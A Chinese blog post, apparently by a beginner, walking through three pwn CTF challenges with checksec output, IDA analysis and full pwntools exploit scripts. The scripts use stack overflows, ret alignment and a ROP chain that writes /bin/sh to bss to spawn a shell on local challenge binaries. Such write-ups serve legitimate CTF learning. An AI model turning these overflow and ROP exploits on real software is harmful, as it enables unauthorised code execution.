PWN PWN PWN 3月赛题目复现!!!特别适合新手

已于 2024-03-31 22:00:10 修改
阅读量743 收藏 9
点赞数 11
文章标签: 网络攻击模型 python
于 2024-03-31 14:44:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XJQ100717/article/details/137199922
版权

目录

3月赛题的复现:

1.worst

1.查看保护

2.拖入ida进行分析

3.写exp

2.worst—pro

1.checksec pwn20

2.ida伪代码

3.exp

3.number

1.checksec

2.ida看伪代码

3.exp

3月赛题的复现:

一般做pwn题的步骤:

1. 先chicksec elf二进制文件

2. 拖入ida看伪代码,查看都有啥函数,看到底用那种方法做。

3. 写exp,边看边写exp

1.worst

1.查看保护

64位,开启了nx保护,NX保护:是否启用内存不可执行保护栈上数据不可执行

Partial RELRO:got的开头部分被设置为只读,其余部分仍可写

Full RELRO:got和plt都为只读,这种状态可以防止对这些结构的修改

2.拖入ida进行分析

从这里我们可以看出偏移为8,有read危险函数,可以造成栈溢出

然后咱们把函数表每个函数都看一下发现tip函数里面有:

后门函数

3.写exp

咱们还要查一下ret

ROPgadget --binary worst --only 'op|ret'

from pwn import*
context(arch='amd64',os='linux',log_level='debug')
p=process('./worst')
offest=8
tip=0x401156
ret=0x40101a
payload=cyclic(offest)+p64(ret)+p64(tip)  #通过栈溢出将返回地址覆盖到tip
p.sendline(payload)
p.interactive()

咱们再说一下为啥要加ret了

在ubuntu18以上版本的系统中,system函数有条指令要求rsp关于0x10字节对齐。加入ret使栈顶被迫下移8个字节,使之对齐16byte。

题目在这里

链接:百度网盘 请输入提取码 提取码:otfr

2.worst—pro

1.checksec pwn20

2.ida伪代码

典型的漏洞函数read,偏移量也是8,可以构造栈溢出

我们发现有system但是没有bin/sh。那么怎么办了。

栈溢出后我们再次调用一下read函数写入/bin/sh,这样的话,问题就解决了

3.exp

查一下rdi,rsi等寄存器的值,因为64位传参要用到这些寄存器

from pwn import*
context(arch='amd64',os='linux',log_level='debug')
p=process('./pwn20')   #为了好写我就改为pwn20了
elf=ELf('./pwn20')
read=elf.plt['read']
offest=8
tip=0x401156
rdi=0x401179
rsi=0x40117b
bss=elf.bss()  #因为bss段为未初始化的全局变量和静态变量,通常情况下是不能向bss段些东西的,但#在一些特殊情况下,比如攻击者利用栈溢出等手段修改bss段内容是可以的
payload=cyclic(offest)+p64(rdi)+p64(0x0)+p64(rsi)+p64(bss)+p64(read)+p64(rdi)+p64(bss)+p\64(tip)        #先是栈溢出,read有两个参数,rdi将0传给read,作为read的第一个参数,表示输入,rsi
#将bss作为read的第二个参数,就是输入地址,然后调用read函数进行输入,最后通过rdi将bss传给system
p.sendline(payload)
p.sendline(b"/bin/sh\x00")
p.interactive()

咱们接着说64位传参和32位传参

64传参是通过寄存器传参的,rdi,rsi,rdx,rcx,r8,r9,其余参数放在栈中,64位先传参再调用函数

32位传参是通过栈传参,32位是先调用函数后传参

题目在这里:

链接:百度网盘 请输入提取码 提取码:hbwm

3.number

1.checksec

保护全开逆天了

2.ida看伪代码

read函数,当读入buf=0x12345678的时候,会直接返回到system("/bin/sh")

这个不需要进行栈溢出。

有些人可能是这样的

单机305419896,并单击右键,有个hexadecimal,单机它,就会变成16进制

3.exp

from pwn import*
p=process('./qiandao')
p.sendline(p64(0x12345678))
p.interactive()

题目在这:

链接:百度网盘 请输入提取码 提取码:hwum

题目复现完毕,谢谢大家,记得一键三连,我才有动力更新

阿河( ˃̶̤́ ꒳ ˂̶̤̀ )
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
2021-NCTF pwn方向题目
Amalllの博客
12-01 3436
周末在学校摸鱼了所以没有参加比后看题又一次深刻的感觉到自己有多菜了(被新生暴打的大二菜狗子 1、easyheap 算是pwn的签到题目了,从libc2.32起加了一个异或的保护,不过因为uaf漏洞点外加并没有啥其他的限制所以利用起来没有什么难度 from pwn import * context.log_level = 'debug' r = lambda : p.recv() rx = lambda x: p.recv(x) ru = lambda x: p.recvuntil(..
[DASCTF 2023六月挑战|二进制专项] 5个pwn
weixin_52640415的博客
06-04 1206
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
pwn】DASCTF Sept 九月
woodwhale的博客
09-26 3682
pwn】DASCTF Sept 月 1、hehepwn 先查看保护,栈可执行,想到shellcode 这题需要注意shellcode的写法 拖入ida中分析 一直以为iso scanf不能栈溢出,后来发我是shabi 先进入sub_4007F9()函数 有个read函数,恰好读完s数组,由于printf是碰到\x00截断,所以如果我们输满0x20个padding就可以读取一个栈地址 我们可以把shellcode写入scanf输入的地址中,通过创建fake rbp进行栈迁移,而这个栈中存有我们写入
DASCTF X CBCTF 2022九月挑战(pwn方向)
FUCKING12的博客
10-06 1857
DASCTF X CBCTF 2022九月挑战(pwn方向)
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1672
今年9~10月的比题目从易到难,知识面广,还是很不错的,一下这比pwn
2021dasctf七月 pwn题解(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 882
前言:算是第一次参加自己觉得能力匹配的比之前的0ctf,tctf的,感觉自己就像个混子,2021国参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比嘛,总归是不可能会做的,不过也算是知道了,比也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
awd的批量脚本 pwn_北极星杯 awd
weixin_39811101的博客
01-12 917
北极星杯 awd服务器共有3个web和一个pwnweb11,down下web1的源码,使用D盾扫描:2,漏洞1:发三个冰蝎的木马,和一个一句话木马冰蝎的后门需要使用冰蝎的客户端进行连接:如图:一句话木马直接使用菜刀或蚁剑连接即可:3,漏洞2:sqlhelper.php的反序列化漏洞:构造payload:class A{public $name;public $male;function __...
DASCTF&BJDCTF 3rd 三道PWN
weixin_44145820的博客
06-21 854
最近看了一下上次安恒五月没做出的几道PWN题,感觉自己水平还是不够,还要多学习 easybabystack(格式化字符串*, ret2csu) 这题有个栈溢出漏洞 但是必须输入正确的密码,否则就直接退出了 还有个格式化字符串漏洞 字符串长度为12 由于密码是/dev/urandom生成的,无法预测。 这里需要利用格式化字符串漏洞的’*'号 %*num$d从栈中取变量作为N 比如num$处的值是0x100,那么这个格式化字符串就相当于%256d 而密码位于18$的位置,我们使用%*18$c就可以打
Bugku S3 AWD排位-9 pwn二进制
08-27
Bugku S3 AWD排位-9 pwn二进制
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
pwn入门题目+exp
01-26
初级的ROP,附有完整exp,可以学一下
pwn入门题目汇总.rar
09-01
pwn入门题目汇总.rar
2023护网蓝初面试题汇总
m0_74131821的博客
05-18 1697
日薪1000+的护网行动开始招人了,有想法的速看!
【Python】Python中变量或者函数加下划线‘_‘的含义
yangweipeng708的博客
05-14 667
理解这些约定可以帮助Python开发者编写更清晰、更Pythonic的代码,并理解其他Python代码中的命名习惯。)通常用来指示特定的编程约定或用法,这些约定主要关乎变量和函数的可访问性以及预期的使用范围。在Python中,变量或函数前面加一个下划线(
python数据分析numpy基础之intersect1d求数组交集
最新发布
sinat_34735632的博客
05-19 189
python的numpy库的intersect1d(x,y)函数,计算x和y的公共元素,并返回去重后的有序结果。相当于求两个数组中的交集,并且进行去重和排序。numpy.intersect1()查找两个数组的公共元素,并且返回去重后的有序结果。ar1,ar2:必选,列表、元组、数组;如果是多维则自动转一维数组;assume_unique:可选,bool,默认False,若为True则可以加快计算素材,此时ar1和ar2需为元素唯一的数组,否则结果不会去重;
windows11 Django环境安装
云深海阔专栏
05-15 147
3)在这个文件夹中使用manager.py和runserver命令运行开发 web 服务器。2)使用 django-admin 工具创建一个名为“mytestsite”的新框架站点。浏览器上访问http://localhost:800。2、windows10 虚拟环境设置。1、验证python和pip3环境。1)创建文件夹及项目目录。4)web浏览器上验证。3、安装Django。
pwn栈溢出题目归纳
08-30
这道pwn栈溢出题目归纳如下: 1. 与其他题目不同的地方是会对内容进行与(&)或(|)操作并泄露一个低12位(buf地址的后3个字节)。 2. 猜测思路是泄露unsorted bin地址,计算malloc_hook地址并将shell写入malloc hook,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值